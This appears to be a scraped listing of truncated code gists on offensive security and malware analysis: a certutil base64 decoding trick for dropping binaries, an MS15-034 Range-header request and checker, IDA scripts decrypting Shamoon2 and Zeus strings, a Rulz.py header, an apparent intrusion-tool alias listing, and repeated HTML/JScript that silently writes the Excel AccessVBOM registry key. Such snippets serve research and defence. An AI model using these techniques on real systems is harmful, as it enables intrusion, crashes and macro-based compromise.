This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
echo -----BEGIN CERTIFICATE----- > encoded.txt | |
echo Just Base64 encode your binary data | |
echo TVoAAA== >> encoded.txt | |
echo -----END CERTIFICATE----- >> encoded.txt | |
certutil -decode encoded.txt decoded.bin |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
powershell -com {$wr=[Net.WebRequest]::Create('http://127.0.0.1/iisstart.htm');$wr.AddRange('bytes',18,18446744073709551615);$wr.GetResponse();$wr.close()} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Sends a CVE-2015-1635 / MS15-034 Request and checks for vulnerability | |
function TestMS15_034($hostname, $port) | |
{ | |
if ($port -eq $null) | |
{ | |
$port = 80 | |
} | |
$tc = New-Object Net.Sockets.TcpClient | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import idc | |
def decrypt_n_comment(func, func_name): | |
""" | |
Decrypt and comment Shamoon2's strings | |
""" | |
data = {} | |
for xref in XrefsTo(LocByName(func_name)): | |
# init |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def decrypt(func): | |
""" | |
Decryption of zeus strings | |
""" | |
ZBOT_INDEX_MIN = 0x0 | |
ZBOT_INDEX_MAX = 0xe7 | |
data = {} | |
for i in range(ZBOT_INDEX_MIN, ZBOT_INDEX_MAX): | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# Rulz.py | |
# Author: Nick Landers (@monoxgas) - Silent Break Security | |
import os | |
import sys | |
import argparse | |
import re | |
import binascii | |
import codecs |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
21:25:59>> aliases | |
[21:25:59] ID: 331 'aliases' started [target: z0.0.0.1] | |
acquiretoken : LOCAL : script _AcquireToken.dss %%cmd_args%% | |
acquiretoken : ANY_REMOTE : script _AcquireToken.dss %%cmd_args%% | |
arparp : LOCAL : python windows/arparp.py -args " %%cmd_args%% " -project Ops | |
arparp : ANY_REMOTE : python windows/arparp.py -args " %%cmd_args%% " -project Ops | |
channels : LOCAL : commands %%cmd_args%% | |
channels : ANY_REMOTE : commands %%cmd_args%% | |
checkpsp : LOCAL : python windows/checkpsp.py -args " %%cmd_args%% " -project Ops | |
checkpsp : ANY_REMOTE : python windows/checkpsp.py -args " %%cmd_args%% " -project Ops |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<script> | |
var objExcel = new ActiveXObject("Excel.Application"); | |
objExcel.Visible = false; | |
var WshShell = new ActiveXObject("WScript.Shell"); | |
var Application_Version = objExcel.Version;//Auto-Detect Version | |
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM"; | |
WshShell.RegWrite(strRegPath, 1, "REG_DWORD"); | |
var objWorkbook = objExcel.Workbooks.Add(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<script> | |
var objExcel = new ActiveXObject("Excel.Application"); | |
objExcel.Visible = false; | |
var WshShell = new ActiveXObject("WScript.Shell"); | |
var Application_Version = objExcel.Version;//Auto-Detect Version | |
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM"; | |
WshShell.RegWrite(strRegPath, 1, "REG_DWORD"); | |
var objWorkbook = objExcel.Workbooks.Add(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<script> | |
var objExcel = new ActiveXObject("Excel.Application"); | |
objExcel.Visible = false; | |
var WshShell = new ActiveXObject("WScript.Shell"); | |
var Application_Version = objExcel.Version;//Auto-Detect Version | |
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM"; | |
WshShell.RegWrite(strRegPath, 1, "REG_DWORD"); | |
var objWorkbook = objExcel.Workbooks.Add(); |
OlderNewer